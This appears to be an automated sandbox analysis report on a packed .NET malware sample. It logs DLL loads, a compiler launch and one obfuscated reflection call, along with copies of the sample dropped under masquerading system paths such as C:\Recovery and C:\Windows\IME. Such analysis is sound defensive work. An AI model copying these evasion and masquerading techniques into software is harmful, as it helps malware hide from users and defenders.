Source: C:\Windows\IME\en-GB\Registry.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\IME\en-GB\Registry.exe	Section loaded: version.dll
Source: C:\Windows\IME\en-GB\Registry.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\IME\en-GB\Registry.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\IME\en-GB\Registry.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\IME\en-GB\Registry.exe	Section loaded: windows.storage.dll
Source: C:\Windows\IME\en-GB\Registry.exe	Section loaded: wldp.dll
Source: C:\Windows\IME\en-GB\Registry.exe	Section loaded: profapi.dll
Source: C:\Windows\IME\en-GB\Registry.exe	Section loaded: cryptsp.dll
Source: C:\Windows\IME\en-GB\Registry.exe	Section loaded: rsaenh.dll
Source: C:\Windows\IME\en-GB\Registry.exe	Section loaded: cryptbase.dll
Source: C:\Windows\IME\en-GB\Registry.exe	Section loaded: sspicli.dll
Source: C:\Windows\IME\en-GB\Registry.exe	Section loaded: mscoree.dll
Source: C:\Windows\IME\en-GB\Registry.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\IME\en-GB\Registry.exe	Section loaded: version.dll
Source: C:\Windows\IME\en-GB\Registry.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\IME\en-GB\Registry.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\IME\en-GB\Registry.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\IME\en-GB\Registry.exe	Section loaded: windows.storage.dll
Source: C:\Windows\IME\en-GB\Registry.exe	Section loaded: wldp.dll
Source: C:\Windows\IME\en-GB\Registry.exe	Section loaded: profapi.dll
Source: C:\Windows\IME\en-GB\Registry.exe	Section loaded: cryptsp.dll
Source: C:\Windows\IME\en-GB\Registry.exe	Section loaded: rsaenh.dll
Source: C:\Windows\IME\en-GB\Registry.exe	Section loaded: cryptbase.dll
Source: C:\Windows\IME\en-GB\Registry.exe	Section loaded: sspicli.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: mscoree.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: version.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: wldp.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: profapi.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Section loaded: sspicli.dll
Source: C:\Recovery\upfc.exe	Section loaded: mscoree.dll
Source: C:\Recovery\upfc.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\upfc.exe	Section loaded: version.dll
Source: C:\Recovery\upfc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\upfc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\upfc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\upfc.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\upfc.exe	Section loaded: wldp.dll
Source: C:\Recovery\upfc.exe	Section loaded: profapi.dll
Source: C:\Recovery\upfc.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\upfc.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\upfc.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\upfc.exe	Section loaded: sspicli.dll

Source: C:\Users\user\Desktop\m4n1AQRhaP.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\m4n1AQRhaP.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: m4n1AQRhaP.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: m4n1AQRhaP.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: m4n1AQRhaP.exe

Static file information: File size 2046464 > 1048576

Source: m4n1AQRhaP.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1f3200

Source: m4n1AQRhaP.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: :C:\Users\user\AppData\Local\Temp\ecdbob4x\ecdbob4x.pdb source: m4n1AQRhaP.exe, 00000000.00000002.1329622101.00000000034BC000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb2 source: iHstGpVMr4QFhc62UUbis.exe, 0000001B.00000002.1661809574.000000001B847000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: m4n1AQRhaP.exe, XdWiGMa4LIUYIZVEPC3.cs

.Net Code: Type.GetTypeFromHandle(ts28QcZsBZ51xAgJMhU.NidtAzv3BqA(16777425)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(ts28QcZsBZ51xAgJMhU.NidtAzv3BqA(16777246)),Type.GetTypeFromHandle(ts28QcZsBZ51xAgJMhU.NidtAzv3BqA(16777260))})

Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ecdbob4x\ecdbob4x.cmdline"
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ecdbob4x\ecdbob4x.cmdline"			Jump to behavior

Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Code function: 0_2_00007FF88B4B5471 push ebx; ret	0_2_00007FF88B4B5474
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Code function: 0_2_00007FF88B4B00BD pushad ; iretd	0_2_00007FF88B4B00C1
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Code function: 0_2_00007FF88B4B01AA push ds; retf	0_2_00007FF88B4B01B2
Source: C:\Users\user\Desktop\m4n1AQRhaP.exe	Code function: 0_2_00007FF88B701D83 push edx; iretd	0_2_00007FF88B701D84
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Code function: 25_2_00007FF88B52F5DE pushad ; iretd	25_2_00007FF88B52F5ED
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Code function: 25_2_00007FF88B4E5471 push ebx; ret	25_2_00007FF88B4E5474
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Code function: 25_2_00007FF88B4E00BD pushad ; iretd	25_2_00007FF88B4E00C1
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Code function: 25_2_00007FF88B4FB990 push ss; iretd	25_2_00007FF88B4FB997
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Code function: 27_2_00007FF88B53F5DE pushad ; iretd	27_2_00007FF88B53F5ED
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Code function: 27_2_00007FF88B4F5471 push ebx; ret	27_2_00007FF88B4F5474
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Code function: 27_2_00007FF88B4F00BD pushad ; iretd	27_2_00007FF88B4F00C1
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Code function: 27_2_00007FF88B4F023D pushad ; ret	27_2_00007FF88B4F0286
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Code function: 27_2_00007FF88B50B990 push ss; iretd	27_2_00007FF88B50B997
Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exe	Code function: 27_2_00007FF88B741D83 push edx; iretd	27_2_00007FF88B741D84
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Code function: 28_2_00007FF88B4FB990 push ss; iretd	28_2_00007FF88B4FB997
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Code function: 28_2_00007FF88B52F5DE pushad ; iretd	28_2_00007FF88B52F5ED
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Code function: 28_2_00007FF88B4E5471 push ebx; ret	28_2_00007FF88B4E5474
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Code function: 28_2_00007FF88B4E00BD pushad ; iretd	28_2_00007FF88B4E00C1
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Code function: 29_2_00007FF88B4FB990 push ss; iretd	29_2_00007FF88B4FB997
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Code function: 29_2_00007FF88B52F5DE pushad ; iretd	29_2_00007FF88B52F5ED
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Code function: 29_2_00007FF88B4E5471 push ebx; ret	29_2_00007FF88B4E5474
Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe	Code function: 29_2_00007FF88B4E00BD pushad ; iretd	29_2_00007FF88B4E00C1
Source: C:\Recovery\upfc.exe	Code function: 30_2_00007FF88B4D5471 push ebx; ret	30_2_00007FF88B4D5474
Source: C:\Recovery\upfc.exe	Code function: 30_2_00007FF88B4D00BD pushad ; iretd	30_2_00007FF88B4D00C1
Source: C:\Recovery\upfc.exe	Code function: 31_2_00007FF88B4D5471 push ebx; ret	31_2_00007FF88B4D5474
Source: C:\Recovery\upfc.exe	Code function: 31_2_00007FF88B4D00BD pushad ; iretd	31_2_00007FF88B4D00C1
Source: C:\Recovery\upfc.exe	Code function: 31_2_00007FF88B4EB990 push ss; iretd	31_2_00007FF88B4EB997
Source: C:\Recovery\upfc.exe	Code function: 31_2_00007FF88B51F5DE pushad ; iretd	31_2_00007FF88B51F5ED
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Code function: 33_2_00007FF88B4B5471 push ebx; ret	33_2_00007FF88B4B5474
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Code function: 33_2_00007FF88B4B00BD pushad ; iretd	33_2_00007FF88B4B00C1
Source: C:\Windows\bcastdvr\uwTuxQS3V.exe	Code function: 33_2_00007FF88B4B01AA push ds; retf	33_2_00007FF88B4B01B2

Source: m4n1AQRhaP.exe	Static PE information: section name: .text entropy: 7.534368807138394
Source: iHstGpVMr4QFhc62UUbis.exe.0.dr	Static PE information: section name: .text entropy: 7.534368807138394
Source: uwTuxQS3V.exe.0.dr	Static PE information: section name: .text entropy: 7.534368807138394
Source: ikEtBZXIKU1m0Gn.exe.0.dr	Static PE information: section name: .text entropy: 7.534368807138394
Source: upfc.exe.0.dr	Static PE information: section name: .text entropy: 7.534368807138394

Source: m4n1AQRhaP.exe, bhNNIF870LFx15i0n6g.cs	High entropy of concatenated method names: '_0023wjg', 'Dispose', '_0023Trg', 'MoveNext', '_0023Zvw', 'get_Current', '_0023Wrg', 'Reset', '_0023Xrg', 'get_Current'
Source: m4n1AQRhaP.exe, YAfWyo5kIcpqg9OSaUw.cs	High entropy of concatenated method names: 'Ak55KqJp6A', 'QdP5Rhd0Kr', 'cts5xvRXSY', 'foE5hfdgZP', 'vRQq8bi2OZkPUHhMtlf6', 'GVY9Rbi2F44kGcJg5MGu', 'y34P5vi21FmgGiRAx6Yu', 'bgKcmti2sLZ4aTsn4BA7', 'BcQVw4i237aJ2eoXRLss', 'F2ZZ9ei2nU7teuTm9aTR'
Source: m4n1AQRhaP.exe, O6urXfzyVeiHL1d6mK.cs	High entropy of concatenated method names: 'rh6iiynu7B', 'XTaiWdDuwq', 'Bdbi562kUh', 'lr8iAHaOSa', 'Pd9iDZ6Fs7', 'EPRicqWgri', 'mMCiXV4slq', 'ajLZGxiKkoYUCQdQdwx2', 'hCJgKciKyCO5htnmwbYN', 'e1U69EiKKNSMojY39spO'
Source: m4n1AQRhaP.exe, hRw3RpgaIDEq22bA7wZ.cs	High entropy of concatenated method names: 'FhLfqKPwBN', 'KyEPqEios6A2pEIeDVey', 'LkZcYcio3bxLqcHKouds', 'OKX9L0io1BCRoftq8i5S', 'EPcMKdioOcZvOCLmrLeE', 'dGOcvyionKwn3sT7DRoM', 'CPX', 'h7V', 'G6s', '_2r8'
Source: m4n1AQRhaP.exe, QRe8VhbYUxABd0tta5y.cs	High entropy of concatenated method names: 'GXAb9LoJCC', 'zWQbwFUMyc', 'K7obG97Syl', 'kG5b0Qx9PK', 'DucbSRjlwv', 'WiVbTRvoLR', 'gjPbgtw2gq', 'MHNbfeBqTW', 'XJobJacKxY', 'wqrbvjCxQi'
Source: m4n1AQRhaP.exe, z49cVIiyJrxPt7xkFVn.cs	High entropy of concatenated method names: 'N2T', 'V29', 'o75', '_2Q4', 'K3B', 'mcnim1LTfjx', 'u23iWgWM9lo', 'uSiV9AiKg9WI5o3PtKmG', 'TcFK9fiKfq5MZ9FMbbfB', 'Pof78EiKJl4SAeia553N'
Source: m4n1AQRhaP.exe, L0QdSZVUVbNw4tJyfaA.cs	High entropy of concatenated method names: 'zdXVN4KoeE', 'cL1VeDLV0l', 'hxdVk832ud', 'Aaohukir6au76PLYo1SO', 'zb8VU6irVRE8AFpJCNXG', 'GNDMICirqXVJX955Q6gG', 'KTUSxoirQUoulC9Tit7W', 'XkAvOhirFdIF7kdPutwD', 'MWTX8Pir1fvUH56ditka'
Source: m4n1AQRhaP.exe, rwk4YOHrXRYY1hW8CCs.cs	High entropy of concatenated method names: '_2SY', 'u8Qim8U4Noa', 'HDJHCKehY8', 'TQeimbRgLM7', 'sZIk1OibOKJ8R1HdlILP', 'YERQ0yibsqkt7yHF3HSF', 'aKjh15ibFIGeBvxNchcq', 'GoGy04ib1HOCoFd6SSar', 'ovdqKrib3R16faYgOjX8', 'vmpT4Oibn2pXiCo3tmcm'
Source: m4n1AQRhaP.exe, D4Le3AsvSOAorifGMYu.cs	High entropy of concatenated method names: 'k7E7oUi9bquuNL0veKw7', 'zuMgfCi9LCtNhbVDpc7W', 'dMJHcGi98aDep1aVOum8', 'vHg7kUOjVp', 'oby18ai9YvpxSy88pyfK', 'py9nO3i9uav73N3ql0gy', 'FtixR5i9CDsCHFsaCtIo', 'dYDOs3i9jarZVlJCIUcG', 'c74Trci99Hlq6eAxH12F', 'iaP7RI0kh8'
Source: m4n1AQRhaP.exe, sqtbm1FnEBCKVgWDRZW.cs	High entropy of concatenated method names: 'Cj1', '_1Td', 'Cz6', 'ht3', 'Vq6F4GxRss', '_947', 'GLZFUNWG0I', 'C0gF7lBYBX', '_1f8', '_71D'
Source: m4n1AQRhaP.exe, XdWiGMa4LIUYIZVEPC3.cs	High entropy of concatenated method names: 'hOsEbdiZKAmgVELCHMkC', 'xafH81iZRGDNS5XcMYfR', 'XPEBBQge5f', 'ycYQymiZPmx8A6BeAiOT', 'BIbnybiZpymOP7Z83Vjp', 'Dbv0iRiZEs2pyJclYx36', 'KKWvnuiZLdpBOiMZKt8O', 'eRFSdpiZ8lTKsMaTftD9', 'm0mOZ1iZbtaet2JrC1aH', 'tJ0qeLiZrnuXjgDeB2Wo'
Source: m4n1AQRhaP.exe, kBW6fNTfW2Jeii3Y4se.cs	High entropy of concatenated method names: 'TxNTvEyn8a', 'qcrTMwamEF', 'A1MTogLX4n', 'foxTa5E3Si', 'ttxTBnmipF', 'uo9TZsb6pk', 'Sd7TlSkvTQ', 'dSrTzXPcAH', 'umJgdyepiX', 'PhIgixjxMR'
Source: m4n1AQRhaP.exe, TqnbJ3RIqtY5PLL2rpO.cs	High entropy of concatenated method names: 'z6LRUOGIXS', 'Hm2R7qmjdM', 'sAmRNQvt9E', 'sl2Re5H5wJ', 'JPdRkbkwwb', 'oXCRyadle6', 'Ha3TjAi0NFuETVTjVw7Y', 'ckMkDfi0UvrBXVaL7XEe', 'VdC0tni07YUQYd4UgU2e', 'zm4IbFi0eQP0BDHDVpmG'
Source: m4n1AQRhaP.exe, A5eNpxH15GRB2tePjJc.cs	High entropy of concatenated method names: '_5t1', 'd65', 'JVpi5yEFJT2', 'Swji5KRFQ3X', 'z4lHsFLNih', 'Rr1impRLsDG', 'RDSi5d0rLjT', 'EoIj1di80DUvQZfdBbD4', 'SxJTuGi8SVO6Vlf14LS3', 'tuBJVUi8T7q5Fk1DSHyj'
Source: m4n1AQRhaP.exe, LXiUXV5LO66BoSltp9I.cs	High entropy of concatenated method names: 'vyF5bA1CIi', 'Ygx5ro4MC3', 'BQv2rHi2eux9xddGsojo', 'vAh8b0i27vpwSyxocqDY', 'haarLti2NxmyvZlnsomQ', 'KHTxTJi2ksxoxlxE5H3p', 'qWHECZi2yyq1jXOhSMaN', 'vOn8hNi2KON8qFoeqXcr', 'q5sk8fi2R6SaiQuL0SHQ'
Source: m4n1AQRhaP.exe, XVNOmZskL4HgPawKDDL.cs	High entropy of concatenated method names: 'vNq', 'O3Q', 'a43', 'V8g', 'g39', '_9By', 'h74', 'fl2', '_4L8', '_8e1'
Source: m4n1AQRhaP.exe, Kw6TNZWZb5jar7GS6HF.cs	High entropy of concatenated method names: 'ril5FrP1jY', 'jvTBL9i2iKGaQqqku3n0', 'stZ41wi2tx3qhcck0h0q', 'wFPwOWihzJLaU69LXSIF', 'tahQoEi2d90q2m9ZC8Ft', 'kcWN21i2DJ1TjkMPAity', 'McrQRai25BauX818OCuL', 'OUwLexi2AsBI4RdZ2mYO', 'cJaWc1i2cStDWS3YhYM8', 'NUb57Xo3YZ'
Source: m4n1AQRhaP.exe, QWfbcVJ5Vj5bpxDgA1p.cs	High entropy of concatenated method names: 'bZbJDchAyt', 'R4uJc2VG2h', 'mIwJmlfavX', 'C1nJX67n4S', '_0023Nn', 'Dispose', 'qBV3Xviain5DYlhHMvJJ', 'kRPdhkiozAB0Y3CTSWU6', 'mPZdN0iadqcCDyn6QBK7', 'QJdLq8iatWVyPR1oUv9J'
Source: m4n1AQRhaP.exe, dKCQbUA7jq6MGQrBlsP.cs	High entropy of concatenated method names: 'EIQALX72Ia', 'LsIA8HMHJV', 'vF22G4iP4QQfWATABgnV', 'MTIYeeiPUgJwEvaXvqX3', 'W59hj0iP7uKaILi8YtHf', 'jQnAenOKOM', 'HjgAkRr3cR', 'lT6Ay6nIXO', 'rfnAK7LXYn', 'EKmARpFDIU'
Source: m4n1AQRhaP.exe, BKLtyPxugE328aFpcZo.cs	High entropy of concatenated method names: 'zW6xY6SGqj', 'LObxjwvekM', 'xTmx9a4bim', 'YyKxwv6M7a', 'Jp5xG98hjC', 'yndx0XPKOB', '_4tg', 'wk8', '_59a', '_914'
Source: m4n1AQRhaP.exe, fBIcvyx4guMFruNZiov.cs	High entropy of concatenated method names: 'RmAx70lrkR', 'fw4xNIUkRe', 'M62', '_1Xu', 'LuR', '_4p3', 'HVh', 'v79xeiTmrU', '_96S', '_9s5'
Source: m4n1AQRhaP.exe, FwDJ4wZUBXH5rlSUSn2.cs	High entropy of concatenated method names: 'W2IZp2dMal', 'BgcZE8Vk6h', 'V0QZLISDN4', 'IpVZ8Ml74d', 'lMXZbQKm8N', 'kWfZrOwotP', 'BjBZur9h9r', 'GfqZCsVflr', 'XWTZY6SsdK', 'G3KZjgU7vX'
Source: m4n1AQRhaP.exe, qptSGbtn2rumTUkrmxV.cs	High entropy of concatenated method names: 'iQAt4mRBGS', 'iuytUYLmqW', 'qoE5HHiRBtoI4YPHpNdu', 'g8CxsIiRoqV6TUPPWxmY', 'rMNSfriRabXfiZgY3MEm', 'LeHc9viRZqwIOZMDKfh2', 'WMrIldiRlFZ83hcRXBV5', 'PqiD4biRzxFMVSBLhrHp', 'PuaFUXixdcFViemgsTvl', 'LlSZcLixiUPhW1LAU8E8'
Source: m4n1AQRhaP.exe, WauZonfkjA3WsYlMTns.cs	High entropy of concatenated method names: 'Xyb', 'Sz4', 'zej', 'QLyfKnl0mo', 'ImcPJWiop40hCRhZrEwV', 'fte4I4ioENCGeaULtIe4', 'fkxfC4ioLt8Zba6qZpgg', 'gwQDycio8WT1vh42gpq9', 'QIGYnAiob8HsY5AJcxxQ', 'gG20criorIDZm9lErFHs'
Source: m4n1AQRhaP.exe, ktEOkxA0CHbZsBvIAo2.cs	High entropy of concatenated method names: 'h2YABdD3kq', 'mTvAZlA0Dn', 'yZ01kNiP23FFUmFLMr1u', 'tedT3hiPPVtik2aaj7hl', 'I7kDinK1YF', 'AkdWrfiP8GMwJQSleAfp', 'VFMyy1iPEJSQ3xbCV46Y', 'tkyitMiPLWxGC9N4DFlZ', 'u7Z6PLiPb3O1XYZM8DR3', 'o98ATsnwMB'
Source: m4n1AQRhaP.exe, V0C0FFcM4iuDN1XEUF8.cs	High entropy of concatenated method names: '_5Z7', '_58k', '_4x4', 'bU6', '_3t4', 'a5C', 'O5ETQhiEhvGl7Doo4sZm', 'ncevSxiE2PbqFSDaa4gC', 'nlDsCJiEPAbIcKF2BQ3R', 'aDycaOpoVP'
Source: m4n1AQRhaP.exe, da71u3XzdGhU80L7hxW.cs	High entropy of concatenated method names: 'UXOHD78ZHu', 'sYl5AUi8hSw6ySmabZfB', 'W3Kj8ri82rCNGlkNTlOU', 'CKbx1mi8PRyymLsFJ6Ib', 'VvyuOSi8p3Ud59rHosNZ', 'eq7', 'd65', 'Dxmi54wKuhw', 'lqYi5UCQQq4', 'F9Oim2voNTB'
Source: m4n1AQRhaP.exe, VGgd7RWOTwyDwqIN5wx.cs	High entropy of concatenated method names: 'xbhWRG46RY', 'OMPWxCJfjv', 'afdWhO5ftK', 'gMTLbmihXsWHPrcocC7l', 'NaQuUdihH6mmIqTJBFLe', 'z5ObX9ihcoJ1wVJuFuCb', 'QfdDoBihmBNrNBj1qvjJ', 'VnuWe0ZGAZ', 'tkgWknBdiI', 'AwvufjihAVeRFobajup4'
Source: m4n1AQRhaP.exe, hAXJD6VDqyicTN7j1gf.cs	High entropy of concatenated method names: 'LnGbtRircpYv4ZlZTIA6', 'u8vWsTirmy8O9TJJMH10', 'hDEM7WirXyMt7jME0vlW', 'qxcbM6irAvCo69OIRK8m', 'UsA9VtirDIZHM8Iq5jFY', '_7kT', '_376', 'EavVmbTpk1', 'cj1VXRXPHn', '_4p5'
Source: m4n1AQRhaP.exe, LN1jilQJyOQN6SeXWRX.cs	High entropy of concatenated method names: 'MHwQMSiuEr', 'r4qQoUO6ax', 'x9kQaDWStA', 'l6KQBJGZ97', 'DmlQZMUhmK', 'UbUfbriubksX3ILLkTDD', 'fO1m0viuLI8ajBFaqcye', 'UjhATliu8OaChRvNKrf4', 'pRvFkIiurYNMNv0bGRFY', 'yJb4mMiuumMCwZOBZqfi'
Source: m4n1AQRhaP.exe, EMmKXdt9PucLSqdPnLh.cs	High entropy of concatenated method names: 'SZctZpmbWC', 'HJetlsRbWV', 'ks8tzNpdpU', 'SNHAaoixLEqgtkDBqyZN', 'pK7moTix8MyUMFDjyeBc', 'pG3UCUixpTUZsOdOX8CD', 'djQ5UnixEuCvbuuwuFlX', 'lsvWAUD2CT', 'lVpXpIixrkKsUMmAXULM', 'wIThd3ixuKnFqoSyMpuN'
Source: m4n1AQRhaP.exe, McC1Rkb3q2XT9bOH3CL.cs	High entropy of concatenated method names: 'FZebIMP7Vc', 'kldb4ylNj7', 'IWLbUbWTdD', 'TmHb7WSm2S', 'Hb2bNFo41H', 'aAHbeNjLub', 'T9gbkTJAXt', 'lDqbyWxVWE', 'M2ubKP7jGx', 'Dy5bR1moJx'
Source: m4n1AQRhaP.exe, biMDVU5f1KS1OrYTdU1.cs	High entropy of concatenated method names: 'xpm5ZxWAnP', 'rga5lhXnS1', 'Hee5zFgsAN', 'gr6C2Zi2SMk0LDX7Zclx', 'YaaedTi2T8Atq38BZ3iI', 'A4S7S8i2GIlRyEXMNSGC', 'wibvwDi203Fk6L3NsFBj', 'jlE5vdOtD6', 'PLd5Mofs8a', 'lOj5o7Nilm'
Source: m4n1AQRhaP.exe, EN97NHX2omQS1yrfxAn.cs	High entropy of concatenated method names: 'w4XXCo3dPt', 'cTSNXji8WoaoLAiy6l5V', 'ANBxDIi8iLabdL4dDEWk', 'qRMV7Qi8tV3KGEHs22sy', 'TnDpjwi85CFM8CsLQvP0', 'd3HXaEi8ANwRqd9PBITr', 'UU8', 'd65', 'hAhi5Q1IHWh', 'Es9i5FdeNSB'
Source: m4n1AQRhaP.exe, IluXLRO7qug7oBt2Ycp.cs	High entropy of concatenated method names: 'vrsOGX5nBB', 'UgMOe8VZNM', 'FDnOkNKXCT', 'jFLOyi5gRs', 'MU8OKB1XFB', 'l2fORrQGxr', 'Eo2Ox1vuiH', 'K34Ohlr1fH', 'sjvO2cAjli', 'meVOPHQ8h2'
Source: m4n1AQRhaP.exe, yBONYJstyJ96Ut1a1FA.cs	High entropy of concatenated method names: 'xsZssKM3Xe', 'V1gsnwxOcS', 'CP3s5hc9NY', 'N0qsAX23GH', 'KJxsDAJFsu', 'x4SscNFU0d', 'e7tsmbrMsd', 'ABYsXa3YL0', 'UV4sHKEuH4', 'yF1sVfm1Jk'
Source: m4n1AQRhaP.exe, z7itLp1zUSVZp5krT4I.cs	High entropy of concatenated method names: '_26K', '_1U7', '_5gR', '_58D', 'H8v', 'B6IOisLyQe', 'PLuOtMl9I6', 'gY2', 'rV4', '_28E'
Source: m4n1AQRhaP.exe, wN6TR62PNcuBGraICgd.cs	High entropy of concatenated method names: 'xgY2Ee5ICT', 'jdd2LWbfgq', 'mDY285Y3UA', 'Y34', '_716', 'p32', 'Na8', 'X25', 'pT1', 'Vnu2bQpkGS'
Source: m4n1AQRhaP.exe, fA0bdqHavhgYNgrQu9R.cs	High entropy of concatenated method names: 'My5', 'V4X', 'zT6', 'eaRHZam0ur', 'rlYimYdwhdF', 'G8fHlX3gyP', 'ADdimjuyh3c', 'iVAPWPibbv01B4y4OODl', 'l4RZ41ibLk1PrcMtBWrb', 'Dlv16vib8pxq7eMpkogQ'
Source: m4n1AQRhaP.exe, G2HVua2KLdRA0rubAV8.cs	High entropy of concatenated method names: '_57l', '_9m5', 't8K', 'k49', 'p65', '_3B1', '_4Pp', '_3M7', '_7b3', 'fAL'
Source: m4n1AQRhaP.exe, AIluKXZ93jCyii70Yy5.cs	High entropy of concatenated method names: 'weLiDSOvVDm', 'UZUiDT8Ypw0', 'Qr9iDgr3WBT', 'jw4iDfHw6Yy', 'y4PiDJlfDF9', 'cxJiDvRaZpE', 'zt4iDM4AuTQ', 'gxelXrpGcB', 'gMgiDo3X7wt', 'z7EiDamjBsT'
Source: m4n1AQRhaP.exe, nE3iYxsOdRP6WmcNBJ.cs	High entropy of concatenated method names: 'H3rE2qDmT', 'FfpjGsiyMBl3wYuGioy0', 'pvA4ImiyoVOFDeJjjM9I', 'FOG5hBiyJXm55CU0BSXF', 'dt30jViyvCc0keLCIRVx', 'reEnZWeAv', 'rUTI2EBa2', 'znI4QjSeo', 'GB3UrNnxq', 'Qse7Q83aC'
Source: m4n1AQRhaP.exe, FIsNoTf22BT97vChVS0.cs	High entropy of concatenated method names: 'pn0fEdJLNs', 'WB8frWVKdp', 'flpfY2fmEq', 'io3fjARUri', 'HYIf93nxJq', 'C7HfwHmMeX', 'j3RfGsZHb1', 'shSf0dHTvZ', '_0023Nn', 'Dispose'
Source: m4n1AQRhaP.exe, QrSHCO69Vh3KIRC562V.cs	High entropy of concatenated method names: 'jZX6GSmPhq', 'g48606LXWl', 'WMM6SfLMTK', 'DKj6Tj3nrY', 'TsU6gGEZIS', 'WYZM7NirliFZOEPrgR7J', 'g6mOGbirBKAmX5rEoIO4', 'nHhJ5KirZOutq29tDN0l', 'SxkBYbirzCX7k3XDkoRw', 'SMwsKZiud8TgEhwLPcpc'
Source: m4n1AQRhaP.exe, eVxdEOJ6IiZF6h1mixg.cs	High entropy of concatenated method names: 'tCjiDbFpfJu', 'aEpiDrTGdeF', 'R2WiDur8QGL', 'VyFjaSiab04gClAKQPEv', 'yUgJW7iaLlemyq2IwJL7', 'uaPxOwia8rB7JRMdxHlo', 'AGLim0Sk2YT', 'aEpiDrTGdeF', 'gM7VXtiaYYEUpf6UMU7n', 'bwOiwEiaugqJvMQlQLnX'
Source: m4n1AQRhaP.exe, SRwrL0RJShOOYXtPs2F.cs	High entropy of concatenated method names: 'fXvRMY10mX', 'MjARosRmBk', 'mUWRauVnwW', 'UgdRBySud6', 'OX2RZjNdLk', 'mCBRlQ2gSm', 'qvvRzofPgt', 'Fy5xdnIEfe', 'fKkxiWuQRy', 'Wrcxtqh3dv'
Source: m4n1AQRhaP.exe, q1KTHULmV7Os1wyO7HJ.cs	High entropy of concatenated method names: 'x2sLHxi1jD', '_64r', '_69F', '_478', 'S2xLVfaaJH', '_4D8', 'GQ4LqjhJ9M', 'atpL687Ktc', '_4qr', 'znELQRdi3i'
